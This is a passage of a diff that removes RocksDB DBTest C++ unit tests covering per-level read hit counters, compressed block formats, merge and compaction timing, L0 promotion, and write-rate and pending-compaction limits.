-  // Test paranoid_file_checks already done in db_block_cache_test
-  ASSERT_OK(
-      dbfull()->SetOptions(handles_[1], {{"paranoid_file_checks", "true"}}));
-  ASSERT_OK(dbfull()->TEST_GetLatestMutableCFOptions(handles_[1],
-                                                     &mutable_cf_options));
-  ASSERT_TRUE(mutable_cf_options.report_bg_io_stats);
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, L0L1L2AndUpHitCounter) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 32 * 1024;
-  options.target_file_size_base = 32 * 1024;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_stop_writes_trigger = 4;
-  options.max_bytes_for_level_base = 64 * 1024;
-  options.max_write_buffer_number = 2;
-  options.max_background_compactions = 8;
-  options.max_background_flushes = 8;
-  options.statistics = rocksdb::CreateDBStatistics();
-  CreateAndReopenWithCF({"mypikachu"}, options);
-
-  int numkeys = 20000;
-  for (int i = 0; i < numkeys; i++) {
-    ASSERT_OK(Put(1, Key(i), "val"));
-  }
-  ASSERT_EQ(0, TestGetTickerCount(options, GET_HIT_L0));
-  ASSERT_EQ(0, TestGetTickerCount(options, GET_HIT_L1));
-  ASSERT_EQ(0, TestGetTickerCount(options, GET_HIT_L2_AND_UP));
-
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  for (int i = 0; i < numkeys; i++) {
-    ASSERT_EQ(Get(1, Key(i)), "val");
-  }
-
-  ASSERT_GT(TestGetTickerCount(options, GET_HIT_L0), 100);
-  ASSERT_GT(TestGetTickerCount(options, GET_HIT_L1), 100);
-  ASSERT_GT(TestGetTickerCount(options, GET_HIT_L2_AND_UP), 100);
-
-  ASSERT_EQ(numkeys, TestGetTickerCount(options, GET_HIT_L0) +
-                         TestGetTickerCount(options, GET_HIT_L1) +
-                         TestGetTickerCount(options, GET_HIT_L2_AND_UP));
-}
-
-TEST_F(DBTest, EncodeDecompressedBlockSizeTest) {
-  // iter 0 -- zlib
-  // iter 1 -- bzip2
-  // iter 2 -- lz4
-  // iter 3 -- lz4HC
-  // iter 4 -- xpress
-  CompressionType compressions[] = {kZlibCompression, kBZip2Compression,
-                                    kLZ4Compression, kLZ4HCCompression,
-                                    kXpressCompression};
-  for (auto comp : compressions) {
-    if (!CompressionTypeSupported(comp)) {
-      continue;
-    }
-    // first_table_version 1 -- generate with table_version == 1, read with
-    // table_version == 2
-    // first_table_version 2 -- generate with table_version == 2, read with
-    // table_version == 1
-    for (int first_table_version = 1; first_table_version <= 2;
-         ++first_table_version) {
-      BlockBasedTableOptions table_options;
-      table_options.format_version = first_table_version;
-      table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-      Options options = CurrentOptions();
-      options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-      options.create_if_missing = true;
-      options.compression = comp;
-      DestroyAndReopen(options);
-
-      int kNumKeysWritten = 100000;
-
-      Random rnd(301);
-      for (int i = 0; i < kNumKeysWritten; ++i) {
-        // compressible string
-        ASSERT_OK(Put(Key(i), RandomString(&rnd, 128) + std::string(128, 'a')));
-      }
-
-      table_options.format_version = first_table_version == 1 ? 2 : 1;
-      options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-      Reopen(options);
-      for (int i = 0; i < kNumKeysWritten; ++i) {
-        auto r = Get(Key(i));
-        ASSERT_EQ(r.substr(128), std::string(128, 'a'));
-      }
-    }
-  }
-}
-
-TEST_F(DBTest, CloseSpeedup) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleLevel;
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = 4;
-  options.max_bytes_for_level_base = 400 * 1024;
-  options.max_write_buffer_number = 16;
-
-  // Block background threads
-  env_->SetBackgroundThreads(1, Env::LOW);
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  test::SleepingBackgroundTask sleeping_task_high;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                 &sleeping_task_high, Env::Priority::HIGH);
-
-  std::vector<std::string> filenames;
-  env_->GetChildren(dbname_, &filenames);
-  // Delete archival files.
-  for (size_t i = 0; i < filenames.size(); ++i) {
-    env_->DeleteFile(dbname_ + "/" + filenames[i]);
-  }
-  env_->DeleteDir(dbname_);
-  DestroyAndReopen(options);
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  env_->SetBackgroundThreads(1, Env::LOW);
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  Random rnd(301);
-  int key_idx = 0;
-
-  // First three 110KB files are not going to level 2
-  // After that, (100K, 200K)
-  for (int num = 0; num < 5; num++) {
-    GenerateNewFile(&rnd, &key_idx, true);
-  }
-
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  Close();
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // Unblock background threads
-  sleeping_task_high.WakeUp();
-  sleeping_task_high.WaitUntilDone();
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-
-  Destroy(options);
-}
-
-class DelayedMergeOperator : public MergeOperator {
- private:
-  DBTest* db_test_;
-
- public:
-  explicit DelayedMergeOperator(DBTest* d) : db_test_(d) {}
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    db_test_->env_->addon_time_.fetch_add(1000);
-    merge_out->new_value = "";
-    return true;
-  }
-
-  virtual const char* Name() const override { return "DelayedMergeOperator"; }
-};
-
-TEST_F(DBTest, MergeTestTime) {
-  std::string one, two, three;
-  PutFixed64(&one, 1);
-  PutFixed64(&two, 2);
-  PutFixed64(&three, 3);
-
-  // Enable time profiling
-  SetPerfLevel(kEnableTime);
-  this->env_->addon_time_.store(0);
-  this->env_->time_elapse_only_sleep_ = true;
-  this->env_->no_slowdown_ = true;
-  Options options = CurrentOptions();
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.merge_operator.reset(new DelayedMergeOperator(this));
-  DestroyAndReopen(options);
-
-  ASSERT_EQ(TestGetTickerCount(options, MERGE_OPERATION_TOTAL_TIME), 0);
-  db_->Put(WriteOptions(), "foo", one);
-  ASSERT_OK(Flush());
-  ASSERT_OK(db_->Merge(WriteOptions(), "foo", two));
-  ASSERT_OK(Flush());
-  ASSERT_OK(db_->Merge(WriteOptions(), "foo", three));
-  ASSERT_OK(Flush());
-
-  ReadOptions opt;
-  opt.verify_checksums = true;
-  opt.snapshot = nullptr;
-  std::string result;
-  db_->Get(opt, "foo", &result);
-
-  ASSERT_EQ(1000000, TestGetTickerCount(options, MERGE_OPERATION_TOTAL_TIME));
-
-  ReadOptions read_options;
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-  int count = 0;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ASSERT_OK(iter->status());
-    ++count;
-  }
-
-  ASSERT_EQ(1, count);
-  ASSERT_EQ(2000000, TestGetTickerCount(options, MERGE_OPERATION_TOTAL_TIME));
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  ASSERT_GT(TestGetTickerCount(options, FLUSH_WRITE_BYTES), 0);
-#endif  // ROCKSDB_USING_THREAD_STATUS
-  this->env_->time_elapse_only_sleep_ = false;
-}
-
-#ifndef ROCKSDB_LITE
-TEST_P(DBTestWithParam, MergeCompactionTimeTest) {
-  SetPerfLevel(kEnableTime);
-  Options options = CurrentOptions();
-  options.compaction_filter_factory = std::make_shared<KeepFilterFactory>();
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.merge_operator.reset(new DelayedMergeOperator(this));
-  options.compaction_style = kCompactionStyleUniversal;
-  options.max_subcompactions = max_subcompactions_;
-  DestroyAndReopen(options);
-
-  for (int i = 0; i < 1000; i++) {
-    ASSERT_OK(db_->Merge(WriteOptions(), "foo", "TEST"));
-    ASSERT_OK(Flush());
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_NE(TestGetTickerCount(options, MERGE_OPERATION_TOTAL_TIME), 0);
-}
-
-TEST_P(DBTestWithParam, FilterCompactionTimeTest) {
-  Options options = CurrentOptions();
-  options.compaction_filter_factory =
-      std::make_shared<DelayFilterFactory>(this);
-  options.disable_auto_compactions = true;
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.max_subcompactions = max_subcompactions_;
-  DestroyAndReopen(options);
-
-  // put some data
-  for (int table = 0; table < 4; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      Put(ToString(table * 100 + i), "val");
-    }
-    Flush();
-  }
-
-  CompactRangeOptions cro;
-  cro.exclusive_manual_compaction = exclusive_manual_compaction_;
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-  ASSERT_EQ(0U, CountLiveFiles());
-
-  Reopen(options);
-
-  Iterator* itr = db_->NewIterator(ReadOptions());
-  itr->SeekToFirst();
-  ASSERT_NE(TestGetTickerCount(options, FILTER_OPERATION_TOTAL_TIME), 0);
-  delete itr;
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, TestLogCleanup) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 64 * 1024;  // very small
-  // only two memtables allowed ==> only two log files
-  options.max_write_buffer_number = 2;
-  Reopen(options);
-
-  for (int i = 0; i < 100000; ++i) {
-    Put(Key(i), "val");
-    // only 2 memtables will be alive, so logs_to_free needs to always be below
-    // 2
-    ASSERT_LT(dbfull()->TEST_LogsToFreeSize(), static_cast<size_t>(3));
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, EmptyCompactedDB) {
-  Options options = CurrentOptions();
-  options.max_open_files = -1;
-  Close();
-  ASSERT_OK(ReadOnlyReopen(options));
-  Status s = Put("new", "value");
-  ASSERT_TRUE(s.IsNotSupported());
-  Close();
-}
-#endif  // ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, SuggestCompactRangeTest) {
-  class CompactionFilterFactoryGetContext : public CompactionFilterFactory {
-   public:
-    virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-        const CompactionFilter::Context& context) override {
-      saved_context = context;
-      std::unique_ptr<CompactionFilter> empty_filter;
-      return empty_filter;
-    }
-    const char* Name() const override {
-      return "CompactionFilterFactoryGetContext";
-    }
-    static bool IsManual(CompactionFilterFactory* compaction_filter_factory) {
-      return reinterpret_cast<CompactionFilterFactoryGetContext*>(
-                 compaction_filter_factory)
-          ->saved_context.is_manual_compaction;
-    }
-    CompactionFilter::Context saved_context;
-  };
-
-  Options options = CurrentOptions();
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(DBTestBase::kNumKeysByGenerateNewRandomFile));
-  options.compaction_style = kCompactionStyleLevel;
-  options.compaction_filter_factory.reset(
-      new CompactionFilterFactoryGetContext());
-  options.write_buffer_size = 200 << 10;
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 4;
-  options.num_levels = 4;
-  options.compression = kNoCompression;
-  options.max_bytes_for_level_base = 450 << 10;
-  options.target_file_size_base = 98 << 10;
-  options.max_compaction_bytes = static_cast<uint64_t>(1) << 60;  // inf
-
-  Reopen(options);
-
-  Random rnd(301);
-
-  for (int num = 0; num < 3; num++) {
-    GenerateNewRandomFile(&rnd);
-  }
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("0,4", FilesPerLevel(0));
-  ASSERT_TRUE(!CompactionFilterFactoryGetContext::IsManual(
-      options.compaction_filter_factory.get()));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("1,4", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("2,4", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("3,4", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("0,4,4", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("1,4,4", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("2,4,4", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("3,4,4", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("0,4,8", FilesPerLevel(0));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ("1,4,8", FilesPerLevel(0));
-
-  // compact it three times
-  for (int i = 0; i < 3; ++i) {
-    ASSERT_OK(experimental::SuggestCompactRange(db_, nullptr, nullptr));
-    dbfull()->TEST_WaitForCompact();
-  }
-
-  // All files are compacted
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-  ASSERT_EQ(0, NumTableFilesAtLevel(1));
-
-  GenerateNewRandomFile(&rnd);
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-
-  // nonoverlapping with the file on level 0
-  Slice start("a"), end("b");
-  ASSERT_OK(experimental::SuggestCompactRange(db_, &start, &end));
-  dbfull()->TEST_WaitForCompact();
-
-  // should not compact the level 0 file
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-
-  start = Slice("j");
-  end = Slice("m");
-  ASSERT_OK(experimental::SuggestCompactRange(db_, &start, &end));
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_TRUE(CompactionFilterFactoryGetContext::IsManual(
-      options.compaction_filter_factory.get()));
-
-  // now it should compact the level 0 file
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-  ASSERT_EQ(1, NumTableFilesAtLevel(1));
-}
-
-TEST_F(DBTest, PromoteL0) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 10 * 1024 * 1024;
-  DestroyAndReopen(options);
-
-  // non overlapping ranges
-  std::vector<std::pair<int32_t, int32_t>> ranges = {
-      {81, 160}, {0, 80}, {161, 240}, {241, 320}};
-
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  Random rnd(301);
-  std::map<int32_t, std::string> values;
-  for (const auto& range : ranges) {
-    for (int32_t j = range.first; j < range.second; j++) {
-      values[j] = RandomString(&rnd, value_size);
-      ASSERT_OK(Put(Key(j), values[j]));
-    }
-    ASSERT_OK(Flush());
-  }
-
-  int32_t level0_files = NumTableFilesAtLevel(0, 0);
-  ASSERT_EQ(level0_files, ranges.size());
-  ASSERT_EQ(NumTableFilesAtLevel(1, 0), 0);  // No files in L1
-
-  // Promote L0 level to L2.
-  ASSERT_OK(experimental::PromoteL0(db_, db_->DefaultColumnFamily(), 2));
-  // We expect that all the files were trivially moved from L0 to L2
-  ASSERT_EQ(NumTableFilesAtLevel(0, 0), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(2, 0), level0_files);
-
-  for (const auto& kv : values) {
-    ASSERT_EQ(Get(Key(kv.first)), kv.second);
-  }
-}
-
-TEST_F(DBTest, PromoteL0Failure) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 10 * 1024 * 1024;
-  DestroyAndReopen(options);
-
-  // Produce two L0 files with overlapping ranges.
-  ASSERT_OK(Put(Key(0), ""));
-  ASSERT_OK(Put(Key(3), ""));
-  ASSERT_OK(Flush());
-  ASSERT_OK(Put(Key(1), ""));
-  ASSERT_OK(Flush());
-
-  Status status;
-  // Fails because L0 has overlapping files.
-  status = experimental::PromoteL0(db_, db_->DefaultColumnFamily());
-  ASSERT_TRUE(status.IsInvalidArgument());
-
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  // Now there is a file in L1.
-  ASSERT_GE(NumTableFilesAtLevel(1, 0), 1);
-
-  ASSERT_OK(Put(Key(5), ""));
-  ASSERT_OK(Flush());
-  // Fails because L1 is non-empty.
-  status = experimental::PromoteL0(db_, db_->DefaultColumnFamily());
-  ASSERT_TRUE(status.IsInvalidArgument());
-}
-#endif  // ROCKSDB_LITE
-
-// Github issue #596
-TEST_F(DBTest, HugeNumberOfLevels) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 2 * 1024 * 1024;         // 2MB
-  options.max_bytes_for_level_base = 2 * 1024 * 1024;  // 2MB
-  options.num_levels = 12;
-  options.max_background_compactions = 10;
-  options.max_bytes_for_level_multiplier = 2;
-  options.level_compaction_dynamic_level_bytes = true;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < 300000; ++i) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 1024)));
-  }
-
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-}
-
-TEST_F(DBTest, AutomaticConflictsWithManualCompaction) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 2 * 1024 * 1024;         // 2MB
-  options.max_bytes_for_level_base = 2 * 1024 * 1024;  // 2MB
-  options.num_levels = 12;
-  options.max_background_compactions = 10;
-  options.max_bytes_for_level_multiplier = 2;
-  options.level_compaction_dynamic_level_bytes = true;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < 300000; ++i) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 1024)));
-  }
-
-  std::atomic<int> callback_count(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction()::Conflict",
-      [&](void* arg) { callback_count.fetch_add(1); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  CompactRangeOptions croptions;
-  croptions.exclusive_manual_compaction = false;
-  ASSERT_OK(db_->CompactRange(croptions, nullptr, nullptr));
-  ASSERT_GE(callback_count.load(), 1);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  for (int i = 0; i < 300000; ++i) {
-    ASSERT_NE("NOT_FOUND", Get(Key(i)));
-  }
-}
-
-// Github issue #595
-// Large write batch with column families
-TEST_F(DBTest, LargeBatchWithColumnFamilies) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.write_buffer_size = 100000;  // Small write buffer
-  CreateAndReopenWithCF({"pikachu"}, options);
-  int64_t j = 0;
-  for (int i = 0; i < 5; i++) {
-    for (int pass = 1; pass <= 3; pass++) {
-      WriteBatch batch;
-      size_t write_size = 1024 * 1024 * (5 + i);
-      fprintf(stderr, "prepare: %" ROCKSDB_PRIszt " MB, pass:%d\n",
-              (write_size / 1024 / 1024), pass);
-      for (;;) {
-        std::string data(3000, j++ % 127 + 20);
-        data += ToString(j);
-        batch.Put(handles_[0], Slice(data), Slice(data));
-        if (batch.GetDataSize() > write_size) {
-          break;
-        }
-      }
-      fprintf(stderr, "write: %" ROCKSDB_PRIszt " MB\n",
-              (batch.GetDataSize() / 1024 / 1024));
-      ASSERT_OK(dbfull()->Write(WriteOptions(), &batch));
-      fprintf(stderr, "done\n");
-    }
-  }
-  // make sure we can re-open it.
-  ASSERT_OK(TryReopenWithColumnFamilies({"default", "pikachu"}, options));
-}
-
-// Make sure that Flushes can proceed in parallel with CompactRange()
-TEST_F(DBTest, FlushesInParallelWithCompactRange) {
-  // iter == 0 -- leveled
-  // iter == 1 -- leveled, but throw in a flush between two levels compacting
-  // iter == 2 -- universal
-  for (int iter = 0; iter < 3; ++iter) {
-    Options options = CurrentOptions();
-    if (iter < 2) {
-      options.compaction_style = kCompactionStyleLevel;
-    } else {
-      options.compaction_style = kCompactionStyleUniversal;
-    }
-    options.write_buffer_size = 110 << 10;
-    options.level0_file_num_compaction_trigger = 4;
-    options.num_levels = 4;
-    options.compression = kNoCompression;
-    options.max_bytes_for_level_base = 450 << 10;
-    options.target_file_size_base = 98 << 10;
-    options.max_write_buffer_number = 2;
-
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    for (int num = 0; num < 14; num++) {
-      GenerateNewRandomFile(&rnd);
-    }
-
-    if (iter == 1) {
-      rocksdb::SyncPoint::GetInstance()->LoadDependency(
-          {{"DBImpl::RunManualCompaction()::1",
-            "DBTest::FlushesInParallelWithCompactRange:1"},
-           {"DBTest::FlushesInParallelWithCompactRange:2",
-            "DBImpl::RunManualCompaction()::2"}});
-    } else {
-      rocksdb::SyncPoint::GetInstance()->LoadDependency(
-          {{"CompactionJob::Run():Start",
-            "DBTest::FlushesInParallelWithCompactRange:1"},
-           {"DBTest::FlushesInParallelWithCompactRange:2",
-            "CompactionJob::Run():End"}});
-    }
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-    std::vector<port::Thread> threads;
-    threads.emplace_back([&]() { Compact("a", "z"); });
-
-    TEST_SYNC_POINT("DBTest::FlushesInParallelWithCompactRange:1");
-
-    // this has to start a flush. if flushes are blocked, this will try to
-    // create
-    // 3 memtables, and that will fail because max_write_buffer_number is 2
-    for (int num = 0; num < 3; num++) {
-      GenerateNewRandomFile(&rnd, /* nowait */ true);
-    }
-
-    TEST_SYNC_POINT("DBTest::FlushesInParallelWithCompactRange:2");
-
-    for (auto& t : threads) {
-      t.join();
-    }
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-}
-
-TEST_F(DBTest, DelayedWriteRate) {
-  const int kEntriesPerMemTable = 100;
-  const int kTotalFlushes = 12;
-
-  Options options = CurrentOptions();
-  env_->SetBackgroundThreads(1, Env::LOW);
-  options.env = env_;
-  env_->no_slowdown_ = true;
-  options.write_buffer_size = 100000000;
-  options.max_write_buffer_number = 256;
-  options.max_background_compactions = 1;
-  options.level0_file_num_compaction_trigger = 3;
-  options.level0_slowdown_writes_trigger = 3;
-  options.level0_stop_writes_trigger = 999999;
-  options.delayed_write_rate = 20000000;  // Start with 200MB/s
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(kEntriesPerMemTable));
-
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Block compactions
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-
-  for (int i = 0; i < 3; i++) {
-    Put(Key(i), std::string(10000, 'x'));
-    Flush();
-  }
-
-  // These writes will be slowed down to 1KB/s
-  uint64_t estimated_sleep_time = 0;
-  Random rnd(301);
-  Put("", "");
-  uint64_t cur_rate = options.delayed_write_rate;
-  for (int i = 0; i < kTotalFlushes; i++) {
-    uint64_t size_memtable = 0;
-    for (int j = 0; j < kEntriesPerMemTable; j++) {
-      auto rand_num = rnd.Uniform(20);
-      // Spread the size range to more.
-      size_t entry_size = rand_num * rand_num * rand_num;
-      WriteOptions wo;
-      Put(Key(i), std::string(entry_size, 'x'), wo);
-      size_memtable += entry_size + 18;
-      // Occasionally sleep a while
-      if (rnd.Uniform(20) == 6) {
-        env_->SleepForMicroseconds(2666);
-      }
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    estimated_sleep_time += size_memtable * 1000000u / cur_rate;
-    // Slow down twice. One for memtable switch and one for flush finishes.
-    cur_rate = static_cast<uint64_t>(static_cast<double>(cur_rate) *
-                                     kIncSlowdownRatio * kIncSlowdownRatio);
-  }
-  // Estimate the total sleep time fall into the rough range.
-  ASSERT_GT(env_->addon_time_.load(),
-            static_cast<int64_t>(estimated_sleep_time / 2));
-  ASSERT_LT(env_->addon_time_.load(),
-            static_cast<int64_t>(estimated_sleep_time * 2));
-
-  env_->no_slowdown_ = false;
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-}
-
-TEST_F(DBTest, HardLimit) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  env_->SetBackgroundThreads(1, Env::LOW);
-  options.max_write_buffer_number = 256;
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 * 1024;
-  options.level0_file_num_compaction_trigger = 4;
-  options.level0_slowdown_writes_trigger = 999999;
-  options.level0_stop_writes_trigger = 999999;
-  options.hard_pending_compaction_bytes_limit = 800 << 10;
-  options.max_bytes_for_level_base = 10000000000u;
-  options.max_background_compactions = 1;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(KNumKeysByGenerateNewFile - 1));
-
-  env_->SetBackgroundThreads(1, Env::LOW);
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  std::atomic<int> callback_count(0);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack("DBImpl::DelayWrite:Wait",
-                                                 [&](void* arg) {
-                                                   callback_count.fetch_add(1);
-                                                   sleeping_task_low.WakeUp();
-                                                 });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Random rnd(301);
-  int key_idx = 0;
-  for (int num = 0; num < 5; num++) {
-    GenerateNewFile(&rnd, &key_idx, true);
-    dbfull()->TEST_WaitForFlushMemTable();
-  }
-
-  ASSERT_EQ(0, callback_count.load());
-
-  for (int num = 0; num < 5; num++) {
-    GenerateNewFile(&rnd, &key_idx, true);
-    dbfull()->TEST_WaitForFlushMemTable();
-  }
-  ASSERT_GE(callback_count.load(), 1);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  sleeping_task_low.WaitUntilDone();
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, SoftLimit) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.write_buffer_size = 100000;  // Small write buffer
-  options.max_write_buffer_number = 256;
-  options.level0_file_num_compaction_trigger = 1;
-  options.level0_slowdown_writes_trigger = 3;
-  options.level0_stop_writes_trigger = 999999;
-  options.delayed_write_rate = 20000;  // About 200KB/s limited rate
-  options.soft_pending_compaction_bytes_limit = 160000;
-  options.target_file_size_base = 99999999;  // All into one file
-  options.max_bytes_for_level_base = 50000;
-  options.max_bytes_for_level_multiplier = 10;
-  options.max_background_compactions = 1;
-  options.compression = kNoCompression;
-
-  Reopen(options);
-
-  // Generating 360KB in Level 3
-  for (int i = 0; i < 72; i++) {
-    Put(Key(i), std::string(5000, 'x'));
-    if (i % 10 == 0) {
-      Flush();
-    }
-  }
-  dbfull()->TEST_WaitForCompact();
-  MoveFilesToLevel(3);
-
-  // Generating 360KB in Level 2
-  for (int i = 0; i < 72; i++) {
-    Put(Key(i), std::string(5000, 'x'));
-    if (i % 10 == 0) {
-      Flush();
-    }
-  }
-  dbfull()->TEST_WaitForCompact();
-  MoveFilesToLevel(2);
-
-  Put(Key(0), "");
-
-  test::SleepingBackgroundTask sleeping_task_low;
-  // Block compactions
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  sleeping_task_low.WaitUntilSleeping();
-
-  // Create 3 L0 files, making score of L0 to be 3.
-  for (int i = 0; i < 3; i++) {
-    Put(Key(i), std::string(5000, 'x'));
-    Put(Key(100 - i), std::string(5000, 'x'));
-    // Flush the file. File size is around 30KB.
-    Flush();
-  }
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-  sleeping_task_low.Reset();
-  dbfull()->TEST_WaitForCompact();
-
-  // Now there is one L1 file but doesn't trigger soft_rate_limit
-  // The L1 file size is around 30KB.
-  ASSERT_EQ(NumTableFilesAtLevel(1), 1);
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  // Only allow one compactin going through.
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "BackgroundCallCompaction:0", [&](void* arg) {
-        // Schedule a sleeping task.
-        sleeping_task_low.Reset();
-        env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                       &sleeping_task_low, Env::Priority::LOW);
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  sleeping_task_low.WaitUntilSleeping();
-  // Create 3 L0 files, making score of L0 to be 3
-  for (int i = 0; i < 3; i++) {
-    Put(Key(10 + i), std::string(5000, 'x'));
-    Put(Key(90 - i), std::string(5000, 'x'));
-    // Flush the file. File size is around 30KB.
-    Flush();
-  }
-
-  // Wake up sleep task to enable compaction to run and waits
-  // for it to go to sleep state again to make sure one compaction
-  // goes through.
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilSleeping();
-
-  // Now there is one L1 file (around 60KB) which exceeds 50KB base by 10KB
-  // Given level multiplier 10, estimated pending compaction is around 100KB
-  // doesn't trigger soft_pending_compaction_bytes_limit
-  ASSERT_EQ(NumTableFilesAtLevel(1), 1);
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  // Create 3 L0 files, making score of L0 to be 3, higher than L0.
-  for (int i = 0; i < 3; i++) {
-    Put(Key(20 + i), std::string(5000, 'x'));
-    Put(Key(80 - i), std::string(5000, 'x'));
-    // Flush the file. File size is around 30KB.
-    Flush();
-  }
-  // Wake up sleep task to enable compaction to run and waits
-  // for it to go to sleep state again to make sure one compaction
-  // goes through.
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilSleeping();
-
-  // Now there is one L1 file (around 90KB) which exceeds 50KB base by 40KB
-  // L2 size is 360KB, so the estimated level fanout 4, estimated pending
-  // compaction is around 200KB
-  // triggerring soft_pending_compaction_bytes_limit
-  ASSERT_EQ(NumTableFilesAtLevel(1), 1);
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-
-  sleeping_task_low.WakeUp();
